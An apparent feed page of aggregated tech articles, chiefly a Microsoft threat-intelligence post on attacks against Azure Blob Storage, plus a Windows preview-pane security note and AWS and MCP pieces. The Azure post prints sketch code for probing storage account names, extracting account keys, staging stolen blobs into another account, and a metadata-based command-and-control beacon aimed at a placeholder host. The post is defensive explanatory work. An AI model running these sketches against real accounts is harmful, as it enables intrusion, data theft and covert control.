Sr. Content Developer at Microsoft, working remotely in PA, TechBash conference organizer, former Microsoft MVP, Husband, Dad and Geek.

Trump DOE confirms it’s canceling over $700M in manufacturing grants

The Department of Energy said it was canceling grants to build new factories in places like Alabama and Kentucky. Three startups are affected.

Anthropic brings Claude Code to the web

Anthropic now lets developers spin up Claude Code agents, and manage them, from their web browser on desktop and mobile.

Inside the attack chain: Threat activity targeting Azure Blob Storage


Azure Blob Storage, like any object data service, is a high-value target for threat actors due to its critical role in storing and managing massive amounts of unstructured data at scale across diverse workloads. Organizations of all sizes use Blob Storage to support key workloads—such as AI, high performance computing (HPC), analytics, media, enterprise backup, and IoT data ingestion—making it a potential vector for attacks that can impact everything from data integrity to business continuity. Threat actors are actively seeking opportunities to compromise environments that host downloadable media or maintain large-scale data repositories, leveraging the flexibility and scale of Blob Storage to target a broad spectrum of organizations.

Recognizing these risks, Microsoft’s Secure Future Initiative (SFI) has strengthened default security by design, but defenders must continue to follow security baseline recommendations and leverage customer-facing security capabilities to stay ahead of evolving threats. In alignment with the MITRE ATT&CK framework, Microsoft Threat Intelligence continually updates threat matrices to map the evolving tactics and techniques targeting cloud environments. While some of our previous work has focused on Kubernetes and containerized workloads at the compute layer of the cloud stack, this blog shifts the lens to the data storage layer—specifically, Azure Blob Storage.

In this blog, we outline some of the unique threats associated with the data storage layer, including the relevant stages of the attack chain for Blob Storage, to connect these risks to actionable Azure security controls and applicable security recommendations. We also provide threat detections to help contain and prevent Blob Storage threat activity with Microsoft Defender for Cloud's Defender for Storage plan. By understanding the unique threats facing Azure Blob Storage and implementing targeted security controls, organizations can better safeguard their most critical workloads and data repositories against evolving attacker tactics.

How Azure Blob Storage works

Azure Storage supports a wide range of options for handling exabytes of blob data from many sources at scale. Blobs store everything from checkpoint and model files for AI to parquet datasets for analytics. These blobs are organized into containers, which function like folders grouping sets of blobs. A single storage account can contain an unlimited number of containers, and each container can store an unlimited number of blobs.
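As a concrete illustration of this hierarchy, here is a minimal sketch that walks an account's containers and blobs with the Python azure-storage-blob SDK; the account URL is a placeholder.

# Minimal sketch: account -> container -> blob hierarchy.
from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient

service = BlobServiceClient(
    account_url="https://<your-account>.blob.core.windows.net",  # placeholder
    credential=DefaultAzureCredential(),
)

# Containers group blobs, much like top-level folders.
for container in service.list_containers():
    container_client = service.get_container_client(container.name)
    # Each container can hold an unlimited number of blobs.
    for blob in container_client.list_blobs():
        print(f"{container.name}/{blob.name} ({blob.size} bytes)")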

Blob Storage also supports HPC, backup, and disaster recovery scenarios for greater resiliency and business continuity, such as backing up on-premises resources or Infrastructure as a Service (IaaS) virtual machine-hosted SQL Server data. Azure Data Lake Storage offers optimizations well suited to file system and analytics workloads, such as hierarchical namespace and fast atomic operations. Blob Storage also supports public access scenarios, such as downloads of static files; blobs are not accessible over the internet unless public access is explicitly configured.

Azure Storage fulfills the cloud shared responsibility model through best practices across identity and access management, secure networking, data protection, and continuous monitoring. It supports best practices that help defend across the attack chain when implemented as part of both a cloud-native identity and access management solution such as Microsoft Entra ID and a cloud-native application protection platform such as Defender for Cloud. Azure Storage integrates with both, allowing least-privilege access through Entra role-based access control (RBAC) and fine-grained Azure attribute-based access control (ABAC).
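To illustrate what Entra-backed, least-privilege access can look like in practice, here is a minimal sketch that issues a short-lived user delegation SAS, signed with an Entra ID identity rather than the account key, using the Python azure-storage-blob SDK. The account, container, and blob names are placeholders.

from datetime import datetime, timedelta, timezone

from azure.identity import DefaultAzureCredential
from azure.storage.blob import (
    BlobSasPermissions,
    BlobServiceClient,
    generate_blob_sas,
)

account = "<your-account>"  # placeholder
service = BlobServiceClient(
    account_url=f"https://{account}.blob.core.windows.net",
    credential=DefaultAzureCredential(),  # Entra ID identity, no shared key
)

now = datetime.now(timezone.utc)
delegation_key = service.get_user_delegation_key(now, now + timedelta(hours=1))

sas = generate_blob_sas(
    account_name=account,
    container_name="reports",        # hypothetical container
    blob_name="q3-summary.pdf",      # hypothetical blob
    user_delegation_key=delegation_key,
    permission=BlobSasPermissions(read=True),  # least privilege: read only
    expiry=now + timedelta(minutes=15),        # short lifetime
)
# Append `sas` to the blob URL to grant time-boxed, read-only access.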

Azure Storage safeguards data in transit with network protections such as network security perimeter, private endpoint/Private Link and virtual networks, and encryption for data in transit via TLS. It uses service-side encryption (SSE) to automatically encrypt all Azure Storage resources persisted to the cloud, including blobs and object metadata; this encryption cannot be disabled. While Storage automatically encrypts all data in a storage account at the service level using 256-bit AES encryption (one of the strongest block ciphers available), it is also possible to enable 256-bit AES encryption at the infrastructure level for double encryption, protecting against a scenario where one of the encryption algorithms or keys is compromised.

Azure Storage integrates with Azure Backup and Microsoft Defender for ransomware and malware protection. Azure Storage also supports a wide range of data protection scenarios, such as preventing deletion or modification of accounts and blobs through immutability settings and enabling recovery from data deletion or overwrites through soft delete and versioning.  

A look at the attack chain

To help defenders apply appropriate controls and our recommendations against various threat scenarios across the attack chain, we take a closer look at the progression.

Figure 1. Attack techniques that abuse Blob Storage along the attack chain, spanning reconnaissance, resource development, initial access, persistence, execution, credential access, discovery, lateral movement, collection, command and control, exfiltration, and impact

Reconnaissance

Threat actors enumerate Blob Storage to identify publicly exposed data and credentials that they can leverage later in the attack chain. Common tactics include DNS and HTTP header probing to scan for valid *.blob.core.windows.net subdomains. Threat actors can now also use language models to generate plausible storage account or container names to make brute-forcing more effective.

Enumeration tools like Goblob have long been available on GitHub, and threat actors can extend this type of capability by misusing other tools on GitHub like QuickAZ, which combines storage enumeration with other Azure reconnaissance capabilities. Threat actors may also leverage easily accessible PowerShell-based scanners to brute-force prefix and suffix combinations for hours using permutation dictionary scripts. They can also turn to dedicated indexers that catalog tens of thousands of publicly exposed containers.
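To make the technique concrete, the following defender-side sketch (in Python) checks whether candidate account names resolve in DNS and whether a given container answers anonymous List Blobs calls, the same two signals enumeration tools rely on. All names are hypothetical; run checks like this only against accounts you own.

import socket

import requests  # third-party: pip install requests

CANDIDATES = ["contoso", "contosodata", "contosobackup"]  # hypothetical names

for name in CANDIDATES:
    host = f"{name}.blob.core.windows.net"
    try:
        socket.gethostbyname(host)  # DNS resolves only if the account exists
    except socket.gaierror:
        continue
    # Anonymous List Blobs call; HTTP 200 means the container is publicly listable.
    url = f"https://{host}/backups?restype=container&comp=list"  # hypothetical container
    response = requests.get(url, timeout=5)
    print(host, "container 'backups' ->", response.status_code)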

When sensitive credentials, such as storage account keys, shared access signatures (SAS), or Microsoft Entra ID principal credentials, are discovered in source code repositories or configuration files (including version histories), threat actors can more easily gain an initial foothold. Storage account keys are particularly high risk because they grant full read, write, and delete access to storage resources. With these credentials, threat actors can escalate privileges, move laterally, or proceed directly to data exfiltration.

Resource development

Threat actors try to exploit misconfigured or missing identity controls to create malicious resources in Blob Storage in furtherance of their operations and targeting. They may attempt to leverage Azure Blob Storage to host spoofed versions of legitimate Microsoft sign-in pages, making it more challenging for potential victims to spot the fake based on an inspection of SSL certificates alone.

Threat actors may attempt to place malicious executables or macro-enabled documents in containers left open to anonymous access or secured by weak or compromised SAS. This could lead to victims downloading harmful content directly from those blob URLs.

Since Blob Storage often stores machine learning training datasets, threat actors may exploit it for data poisoning by injecting mislabeled or malicious samples to skew model behavior and produce incorrect predictions.

Initial access

A single misconfigured endpoint could expose sensitive information. Theoretically, a threat actor could attempt to exploit blob-triggered Azure Functions using Event Grid that process files in storage containers, or Azure Logic Apps that automate file transfers from external sources like FTP servers, to gain entry to downstream workflows linked to Azure Storage—if those workflows rely on misconfigured or insufficiently secured authentication mechanisms. This could allow an attacker to maliciously trigger trusted automation or hijack event routing to escalate privileges or move laterally within the environment.

Persistence

If a threat actor gains access to an environment through Blob Storage, they may attempt to establish a long-term foothold by manipulating identity and access configurations that are resilient to standard remediation efforts such as key rotations or password resets. These techniques may include assigning built-in roles or custom roles with elevated privileges to identities under their control, generating SAS with broad permissions and extended expiration periods, modifying container-level access policies to permit anonymous read access, enabling Secure File Transfer Protocol (SFTP) on storage accounts, or leveraging soft-delete capabilities to conceal malicious payloads by uploading, deleting, and later restoring blobs.
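A simple audit can surface one of these footholds: containers whose access level has been quietly flipped to allow anonymous reads. A minimal sketch with the Python SDK follows (the account URL is a placeholder).

from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient

service = BlobServiceClient(
    account_url="https://<your-account>.blob.core.windows.net",  # placeholder
    credential=DefaultAzureCredential(),
)

for container in service.list_containers():
    props = service.get_container_client(container.name).get_container_properties()
    # public_access is None when anonymous access is disabled;
    # "blob" or "container" means anonymous reads are possible.
    if props.public_access:
        print(f"ALERT: '{container.name}' allows anonymous access: {props.public_access}")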

Threat actors frequently abuse legitimate tools such as AADInternals to establish backdoors and persist, enabling access to both cloud and hybrid resources. Additionally, frameworks like AzureHound are extensively leveraged to identify privilege escalation paths from enumerated Azure resources.

Defense evasion

Threat actors may attempt to evade detection by tampering with Blob Storage networking and logging configurations—loosening or deleting firewall rules, adding overly permissive IP address ranges or virtual network (VNet) rules, creating unauthorized private endpoints, distributing requests across regions, or disabling diagnostic logging.

Credential access

Threat actors may attempt to obtain Blob Storage credentials through several vectors:

  • Token and key extraction: Threat actors with access to Entra ID tokens may reuse refresh tokens to obtain new access tokens, or invoke privileged management APIs (for example, listKeys) to extract primary and secondary storage account keys. These keys may grant full data-plane access and bypass identity-based controls.
  • Cloud shell persistence abuse: Because Azure Cloud Shell stores session data in a hidden blob container within the user's storage account, threat actors with access may retrieve cached credentials, command history, or configuration files containing sensitive information.
  • Exposure through misconfiguration: If secure transfer is not enforced or network access controls are overly permissive, shared keys or SAS tokens may be exposed in transit or through public endpoints. This includes keys and tokens found in exposed or compromised endpoints or code repositories. These credentials can then be reused by threat actors to access or exfiltrate data.
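To make the listKeys vector concrete, here is a sketch using the azure-mgmt-storage management SDK; any principal permitted to call this operation can mint full data-plane credentials regardless of its data-plane role assignments. Subscription, resource group, and account names are placeholders.

from azure.identity import DefaultAzureCredential
from azure.mgmt.storage import StorageManagementClient  # pip install azure-mgmt-storage

client = StorageManagementClient(
    credential=DefaultAzureCredential(),
    subscription_id="<subscription-id>",  # placeholder
)

keys = client.storage_accounts.list_keys("<resource-group>", "<account-name>")
for key in keys.keys:
    # Each key grants unrestricted data-plane access, bypassing
    # Entra ID role assignments entirely; never log the value itself.
    print(key.key_name)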

Discovery

After gaining a foothold in Azure, threat actors might map Blob Storage to locate valuable data and understand defensive settings. To uncover blob containers unintentionally exposed publicly, they could enumerate the broader cloud estate—querying subscriptions, resource groups, and storage account inventories. After identifying accounts, threat actors could probe deeper: listing containers and blobs, inspecting metadata, and retrieving configuration details such as firewall rules, logging targets, immutability policies, and backup schedules. This would enable them to identify where sensitive data resides and assess which controls can be bypassed or disabled to facilitate collection, exfiltration, or destruction.

Lateral movement

When a new blob is added to a container, Azure can trigger Azure Functions, Logic Apps, or other workflows. If a threat actor controls the source container and an Event Grid subscription is configured, they may upload specially crafted files that trigger downstream compute resources running under managed identities, which may have elevated permissions to move laterally into other services.

If Azure Functions store their code in Azure Storage and threat actors gain write access, they may attempt to replace the code with malicious files. When the function is triggered by a blob event, HTTP request or timer, it could run malicious code under the function’s identity, potentially granting access to other resources.

Threat actors may also target automated data pipelines or third-party integrations that trust blob-based inputs. Enterprises often use Azure Data Factory and Azure Synapse Analytics to copy and transform data from Azure Blob Storage. These pipelines typically authenticate to Blob using managed identities, service principals, SAS tokens, or account keys, and may connect over managed private endpoints. If an attacker can modify data in a source container, they may influence downstream processing or gain access to services that trust the pipeline’s identity, enabling further lateral movement.

Collection

If blob containers are misconfigured, threat actors may be able to list and download large volumes of data directly from storage. If access is obtained, they may copy or export sensitive files into a staging container they control, using Storage operations like StartCopy, SyncCopy, or CopyBlob through AzCopy or the Azure Storage REST API to stay within Azure and evade detection. They may also compress or encrypt the staged data before attempting to exfiltrate it.
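Reduced to its core, this in-Azure staging pattern is a single server-side copy operation; knowing what it looks like helps defenders recognize the corresponding Copy Blob operations in their logs. A sketch with the Python SDK, with placeholder URLs and SAS tokens:

from azure.storage.blob import BlobClient

# Both URLs are placeholders; the source URL carries a leaked SAS token.
source_url = "https://victimaccount.blob.core.windows.net/data/customers.csv?<sas>"
staging = BlobClient.from_blob_url(
    "https://stagingaccount.blob.core.windows.net/staging/customers.csv?<sas>"
)

# Asynchronous server-side copy: the data never leaves Azure's network.
staging.start_copy_from_url(source_url)
print(staging.get_blob_properties().copy.status)  # "pending" or "success"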

Command and control

Blob Storage can be abused to distribute malware if the account or credentials are compromised. Threat actors may try to use Blob Storage as a covert beacon channel, where malware running on compromised hosts periodically polls for new blobs or metadata updates containing command payloads. After infecting a target, malware might send HEAD or GET requests to the Azure blob’s REST API, retrieving metadata without downloading the file content. If malware parses these headers as communication channels, it may send exfiltrated data back by writing separate metadata updates. Threat actors could embed new commands within metadata fields, meaning the blob’s content remains unchanged while the metadata plane acts as a persistent, stealthy command-and-control (C2) server. 
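A sketch of that metadata-beacon pattern helps show why it is stealthy: the poll is an HTTP HEAD that never downloads content, so the blob body never changes. All names, keys, and URLs below are hypothetical.

import time

from azure.storage.blob import BlobClient

beacon = BlobClient.from_blob_url(
    "https://c2account.blob.core.windows.net/sync/config.dat?<sas>"  # placeholder
)

while True:
    # HEAD request: fetches properties and metadata without downloading content.
    metadata = beacon.get_blob_properties().metadata
    command = metadata.get("cmd")  # hypothetical metadata key
    if command:
        result = f"ran:{command}"  # stand-in for actual execution
        # "Exfiltration" via a metadata write; the blob body is untouched.
        beacon.set_blob_metadata({"result": result})
    time.sleep(60)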

Additionally, threat actors may attempt to exploit object replication to propagate payloads across environments. If a replication policy is successfully configured, any new blobs added to a compromised source container are automatically copied to a trusted destination container—turning it into a distribution hub and enabling supply chain–style attacks.

Exfiltration

If threat actors gain access to the environment, they might leverage Azure-native tools like Azure Storage Explorer or AzCopy to exfiltrate data at scale—exploiting Azure’s high bandwidth and trusted domains to evade detection. 

For instance, they could enable static website hosting and copy sensitive blobs into the publicly accessible $web container. Disabling anonymous access at the storage account level offers no protection here, because the $web container always remains publicly accessible. In another scenario, threat actors could exfiltrate data into a separate Azure subscription they control, using Microsoft's internal network as a covert transport layer to bypass controls.

Threat actors could also embed exfiltration logic within Azure Functions, Logic Apps, or Automation runbooks, disguising them as legitimate maintenance tasks and throttling transfers to stay below volume or rate thresholds.

Third-party integrations can also lead to indirect exposure if the integrated products are compromised. For example, in 2023, defenders whose environments had the MOVEit Transfer application connected to Blob Storage for file transfers or archiving had to contend with a zero-day vulnerability, which Microsoft later attributed in a tweet to Lace Tempest (known for ransomware operations and running the Clop extortion site).

Impact

If threat actors obtain high-privilege roles, storage account keys, or broadly scoped SAS tokens, they can cause extensive damage—for example, issuing mass DeleteBlob or DeleteContainer operations, overwriting objects (including with empty content), or re-encrypting data by reuploading modified content or writing new content to blobs. With the necessary privileges, threat actors can also modify file contents or metadata, change access tiers, and remove legal holds. In many scenarios, simply reading or exfiltrating data can result in long-term impact even without immediate disruption, such as in cases of espionage.

Recommendations

Microsoft recommends the following mitigations to reduce the impact of this threat. 

Apply zero trust principles to Azure Storage.

Business asset security depends on the integrity of the privileged accounts that administer your IT systems. Refer to our FAQ for answers on securing privileged access. Learn to enable the Azure identity management and access control security best practices, such as ensuring separate user accounts and mail forwarding for Global Administrator accounts. Follow best practices for using Microsoft Entra role-based access control.

Implement our security recommendations for Blob Storage.

Monitor the Azure security baseline for Storage and its recommendations using Defender for Cloud.

Microsoft Defender for Cloud periodically analyzes the security state of your Azure resources to identify potential security vulnerabilities and then provides security recommendations on how to address them. For more information, see Review your security recommendations.

Enable Microsoft Defender for Storage.

Defender for Storage provides an additional layer of security intelligence that detects unusual and potentially harmful attempts to access or exploit storage accounts. Its alerts detect and prevent top cloud storage threats, including sensitive data exfiltration, data corruption, and malicious file uploads. For more information, see Understand security threats and alerts in Microsoft Defender for Storage.

You don’t need to enable diagnostic logs for analysis. Defender for Storage also detects suspicious activities from entities without identities that access your data using misconfigured and overly permissive SAS. These SAS might be leaked or compromised.

Sensitive data threat detection considers the sensitivity of the data at risk, quickly identifying and addressing the most significant risks. It also detects exposure events and suspicious activities on resources containing sensitive data. Learn more about sensitive data threat detection.

Enable Defender for Storage via built-in policy. Monitor compliance states to detect if an attacker attempts to tamper with Defender for Storage to evade defenses, and automatically respond with alerts and recovery tasks.

Malware scanning in Defender for Storage detects and mitigates a wide variety of malware threats in near real time, either by scanning blobs automatically as they are uploaded or modified, or on demand for proactive security, incident response, partner data integration, and securing data pipelines and machine learning datasets.

You can store scan results using index tags, which can be used by applications to automate workflows. Microsoft Defender for Cloud also generates relevant security alerts in the portal, so you can configure automations or export them to Microsoft Sentinel or another SIEM. You can also send results to an Event Grid for automating response and create an audit trail with Log Analytics.
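For example, a pipeline step could gate processing on the scan-result index tag. The tag key and value shown below ("Malware Scanning scan result" / "No threats found") follow the documented Defender for Storage convention, but verify them against your own scan output; all other names are placeholders.

from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobClient

blob = BlobClient(
    account_url="https://<your-account>.blob.core.windows.net",  # placeholder
    container_name="uploads",   # hypothetical container
    blob_name="invoice.pdf",    # hypothetical blob
    credential=DefaultAzureCredential(),
)

tags = blob.get_blob_tags()
if tags.get("Malware Scanning scan result") == "No threats found":
    print("Clean: safe to hand off to the next pipeline stage.")
else:
    print("Not verified clean; hold for review.")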

Scanning supports automated remediation, including built-in soft deletion of malicious blobs discovered during scanning, blocking access, quarantining, and forwarding clean files.

Enable Defender Cloud Security Posture Management (CSPM).

Enabling the CSPM plan extends CSPM capabilities that are automatically enabled as part of Defender for Cloud to offer extra protections for your environment such as cloud security explorer, attack path analysis, and agentless scanning for machines.  

The Sensitive data discovery component of CSPM identifies sensitive resources and their related risks, then helps prioritize and remediate those risks using the Microsoft Purview classification engine.

Use the cloud security checklist as a structured approach for securing your Azure cloud estate.

This checklist provides security guidance for those managing the technology infrastructure that supports all the workload development and operations hosted on Azure. To help ensure your workloads are secure and aligned with the Zero Trust model, use the design review checklist for security. We also provide complementary guidance on applying security practices and DevSecOps controls in a security development lifecycle.

Enable threat protection for AI services.

Blob Storage is often used to store training datasets for Azure Machine Learning. Because data poisoning is among the most severe machine learning threats, it is critical to scan uploads before they ever enter your pipeline to prevent targeted poisoning attacks.

Microsoft Defender XDR detections

Microsoft Defender for Cloud

When Defender for Storage is enabled, the following alerts in Defender for Cloud may indicate Azure Blob Storage threat activity. Note that other alerts apply to Azure Files.

Some of these alerts will not work if sensitive data threat detection is disabled. Some alerts may be relevant to secondary stages of the attack chain or only be an indication of a penetration test in your organization.

Reconnaissance
Resource Development
Initial Access
Discovery
Lateral Movement
Collection
Command and control
Exfiltration
Impact

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article
  • Vulnerability impact assessment

Note that some promptbooks require access to Microsoft plugins, such as those for Microsoft Defender XDR or Microsoft Sentinel.

MITRE ATT&CK Techniques observed

This threat exhibits the use of the following attack techniques. For standard industry documentation about these techniques, refer to the MITRE ATT&CK framework.

Reconnaissance

T1593.002 Search Open Websites/Domains: Search Engines | Threat actors may use search engines and advanced querying (for example, site:*.blob.core.windows.net) to discover exposed Blob Storage accounts.

T1594 Search Victim-Owned Websites | Threat actors might look for storage accounts of a victim enterprise by searching its websites. Victim-owned website pages might be stored on a storage account or contain links to retrieve data stored in a storage account. The links contain the URL of the storage and provide an entry point into the account.

T1595.003 Active Scanning: Wordlist Scanning | Threat actors might attempt to locate publicly accessible cloud storage accounts or containers by iteratively trying different permutations or using target-specific wordlists to discover storage endpoints that can be probed for vulnerabilities or misconfigurations.

T1596 Search Open Technical Databases | Threat actors might search public databases for publicly available storage accounts that can be used during targeting.

T1596.001 Search Open Technical Databases: DNS/Passive DNS | Threat actors might search for DNS data for valid storage account names that could become potential targets by querying nameservers using brute-force techniques to enumerate existing storage accounts in the wild or searching through centralized repositories of DNS query responses.

Resource Development

T1583.004 Acquire Infrastructure: Server | If threat actors exploit weak or misconfigured identity controls, Blob Storage could be misused as attacker-controlled infrastructure for hosting malicious payloads, phishing, or C2 scripts.

Initial Access

T1566.001 Phishing: Spearphishing Attachment | Blob Storage could host malicious attachments for spear phishing if threat actors leverage compromised SAS tokens or misconfigured anonymous access.

T1566.002 Phishing: Spearphishing Link | Blob Storage could be misused as a publicly accessible host for spear-phishing links if anonymous or misconfigured containers exist.

T1078.004 Valid Accounts: Cloud Accounts | Threat actors could gain an account-like foothold in Blob Storage if they compromise SAS or storage account keys or successfully take control of a Microsoft Entra ID principal account that holds roles or permissions over Blob Storage. 

Persistence

T1098.001 Account Manipulation: Additional Cloud Credentials | To maintain access even if compromised credentials are revoked, threat actors may try to exploit Blob Storage’s Role-Based Access Control (RBAC) by modifying permissions on identity objects, like Microsoft Entra ID security principals. They may also create high-privilege SAS tokens with long expiry, modify container access levels to allow anonymous reads, or provision SFTP accounts that bypass key rotation.

Defense Evasion

T1562.011 Impair Defenses: Disable or Modify Tools | Threat actors can try to disable, suppress, or modify Defender for Storage scanning features.

T1562.007 Impair Defenses: Disable or Modify Cloud Firewall | Threat actors may try to disable, modify, or reconfigure Blob Storage’s firewall and virtual network rules—such as by granting exceptions for trusted services through managed identities, establishing private endpoints, or leveraging geo-replication—to mask access channels and maintain persistent, covert access even if primary credentials are revoked. 

Credential Access

T1528 Steal Application Access Token | Threat actors may compromise Blob Storage by stealing OAuth-based application access tokens (including refresh tokens) or by leveraging subscription-level privileges to query management APIs and extract primary and secondary storage account keys. While compromised tokens enable impersonation of legitimate users with constrained, renewable privileges, keys grant unrestricted data-plane access that bypasses identity-based controls. Possession of either credential type can lead to full access to blob containers, facilitating data compromise and lateral movement across the cloud environment.

T1003 OS Credential Dumping | Threat actors might dump Cloud Shell profiles and session history—stored in blob containers of an Azure Storage account—to extract sensitive credentials such as OAuth tokens, API keys, or other authentication secrets. While these credentials differ from traditional OS password hashes, their extraction is analogous to conventional credential dumping because threat actors can use them to impersonate legitimate users and gain unauthorized, persistent access to Blob Storage, facilitating lateral movement and data compromise.

T1040 Network Sniffing | Threat actors might passively intercept network traffic destined for Blob Storage when unencrypted protocols are allowed, exposing shared keys, SAS tokens, or API tokens that could then be used to gain unauthorized access to the blob data plane. By exploiting cloud-native traffic mirroring tools, a threat actor could intercept and analyze the network data flowing to and from the virtual machines interacting with Blob Storage.

Discovery

T1580 Cloud Infrastructure Discovery | Blob Storage could be enumerated post-compromise to list subscriptions, resource groups, or container names that are not externally visible.

T1619 Cloud Storage Object Discovery | Blob Storage could be enumerated post-compromise to find specific blob data and configuration details, such as by calling listing APIs to inventory objects or using control-plane access to retrieve firewall rules, logging, and backup policies.

Lateral Movement

T1021.007 Remote Services: Cloud Services | Threat actors might manipulate Blob Storage to trigger a compute service, such as Azure Functions, after placing a malicious blob in a monitored container. This automatic execution chain lets attackers pivot from the compromised container to the compute resource, potentially infiltrating additional components.

Collection

T1074.002 Data Staged: Remote Data Staging | Blob Storage could be used as a “staging area” if permissions are overly broad.

T1530 Data from Cloud Storage Object | Blob Storage could be abused to retrieve or copy data directly from containers if they are misconfigured, publicly accessible, or if keys or SAS tokens are obtained. This might include selectively downloading stored files.

Command and Control

T1105 Ingress Tool Transfer | Threat actors might upload and store malicious programs or scripts in Blob Storage after compromising the storage account or its credentials, leverage automatic synchronization to “fan out” malicious payloads across hosts that regularly pull from blob containers, and facilitate ongoing C2 to enable additional compromise and lateral movement. By merging malicious uploads with normal blob usage, threat actors could stealthily distribute harmful tools to multiple hosts simultaneously, reinforcing both C2 and lateral movement.

Exfiltration

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage | Blob Storage may facilitate data exfiltration if permissions are overly permissive or credentials (for example, account keys, SAS tokens) are compromised. Threat actors may abuse the “static website” feature to expose blob containers through public web endpoints or use tools like AzCopy to transfer stolen data.

T1030 Data Transfer Size Limits | A threat actor might deliberately constrain the packet sizes of Blob Storage data to remain below established thresholds by transferring it in fixed-size chunks rather than as entire blobs.

T1020 Automated Exfiltration | Threat actors might embed exfiltration routines in predefined automation processes in Blob Storage to evade detection.

T1537 Transfer Data to Cloud Account | Threat actors might transfer Blob Storage data to another cloud account that is under their control by using internal APIs and network paths that evade detection mechanisms focused on external data transfers.

Impact

T1485 Data Destruction | Blob Storage could be compromised or misused for data destruction, where a threat actor deletes or overwrites blob data for impact.

T1486 Data Encrypted for Impact | Blob Storage could be targeted by ransomware if threat actors obtain privileged access or compromise keys.

T1565 Data Manipulation | Threat actors might insert, delete, or modify Blob Storage data to compromise data integrity and influence outcomes by altering blob contents or metadata, disrupting business processes, distorting organizational insights, or concealing malicious activities.

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.



Windows Shell Previews – Restricted


Windows users who installed the October 2025 Security Updates may have noticed an unexpected change if they use the Windows Explorer preview pane. When previewing a downloaded PDF file, the preview is now replaced with the following text:

Explorer Preview: “The file you are attempting to preview could harm your computer.”

While it also occurs when viewing files on remote Internet Zone file shares, the problem doesn’t occur for other files on your local disk, for remote shares in your Trusted or Intranet zone, or if you manually remove the Mark-of-the-Web from the file (although Explorer seems to cache it, so you have to restart Explorer to see the change 😬).

What happened?

The change in Windows was a trivial one: the value for URLACTION_SHELL_PREVIEW (0x180f) in the Internet Zone (3) was changed from Enabled (0) to Disabled (3).

For decades, before asking previewers to show a preview for a file, Windows Explorer has consulted the SHELL_PREVIEW URLAction to see whether the file's location allows previews. With this setting change, the permission to show previews is now gone for files that originate from the Internet Zone.

Why?

The reason is a simple one that we've covered before: the risk of leaking NTLM credential hashes to the internet when retrieving resources over SMB via the file: protocol. As we discussed in the post on File Restrictions, browsers restrict use of the file: protocol to files that were themselves opened via the file: protocol. When you preview a downloaded file in Explorer, the URL to that download uses file:, and thus the previewer is allowed to request file: URLs, potentially leaking hashes when the file is previewed. With this change, the threat is blunted: with previews disabled, you'd have to actually open the downloaded file to leak a hash.

Unfortunately, this fix is a blunt instrument: while HTML files can trivially reference subresources, other file types like PDF files typically cannot (we disable PDF scripting in Explorer previews) but are blocked anyway.

If you like, you can revert this change on your own PC by resetting the registry key (or by adding download shares you trust to your Trusted Sites Zone). However, keep in mind that doing so reenables the threat vector, so you’ll want to make sure you have another compensating control in place: for example, disabling NTLM over SMB, and/or configuring your gateway/firewall to block SMB traffic.
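If you choose to revert, a minimal sketch of the registry change, assuming the standard per-user zone settings path (zone 3 is the Internet Zone; value 180F is URLACTION_SHELL_PREVIEW), looks like this in Python, run as the affected user:

import winreg

# Zone 3 = Internet Zone; value 180F = URLACTION_SHELL_PREVIEW.
ZONE3 = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"

with winreg.OpenKey(winreg.HKEY_CURRENT_USER, ZONE3, 0, winreg.KEY_SET_VALUE) as key:
    # 0 = Enabled (allow previews); 3 = Disabled (the new default).
    winreg.SetValueEx(key, "180F", 0, winreg.REG_DWORD, 0)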

-Eric




AWS Weekly Roundup: Kiro waitlist, EBS Volume Clones, EC2 Capacity Manager, and more (October 20, 2025)


I’ve been inspired by all the activities that tech communities around the world have been hosting and participating in throughout the year. Here in the southern hemisphere we’re starting to dream about our upcoming summer breaks and closing out on some of the activities we’ve initiated this year. The tech community in South Africa is participating in Amazon Q Developer coding challenges that my colleagues and I are hosting throughout this month as a fun way to wind down activities for the year. The first one was hosted in Johannesburg last Friday with Durban and Cape Town coming up next.

Last week’s launches
These are the launches from last week that caught my attention:

Additional updates
I thought these projects, blog posts, and news items were also interesting:

Upcoming AWS events
Keep a look out and be sure to sign up for these upcoming events:

AWS re:Invent 2025 (December 1-5, 2025, Las Vegas) — AWS flagship annual conference offering collaborative innovation through peer-to-peer learning, expert-led discussions, and invaluable networking opportunities.

Join the AWS Builder Center to learn, build, and connect with builders in the AWS community. Browse here for upcoming in-person and virtual developer-focused events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Veliswa.


MCP vs. API Gateways: They’re Not Interchangeable

1 Share

The organizations I work with are rapidly adopting the Model Context Protocol (MCP) to connect their services and data to AI models through AI agents, but they’re running into familiar challenges: securing access to MCP servers and tools while providing routing, rate limiting, observability and developer portals.

The early days of API adoption taught us painful lessons about security breaches, performance disasters and operational chaos when services were exposed without proper gateway controls.

If you’re building and exposing MCP servers in your enterprise, you’re probably asking the question I hear all the time: “Can we just use our existing API gateway for MCP?”

The short answer is "maybe," but the real question is: should you? API gateways were not built for MCP use cases. In fact, most API gateway vendors will eventually build dedicated MCP gateways.

Let’s explore the fundamental paradigm difference between APIs and MCP and why the existing infrastructure (API gateway) must evolve.

APIs Are Stateless, MCP Is Stateful

Before we dig into what the infrastructure should do, we need to understand the obvious differences between these two approaches. APIs are “stateless” services that operate on each request individually in isolation. REST APIs heavily use the underlying transport (HTTP) for the semantics of the protocol. What this means, practically, is that all the information needed to route, authorize and enforce policy in an API gateway lives in the HTTP headers and URL structure.

Your API gateway can make intelligent decisions by examining:

  • Method (GET, POST, PUT, DELETE)
  • Path (/users/123/orders)
  • Headers (Authorization: Bearer xyz, Content-Type)
  • Query parameters (?limit=10&offset=50)

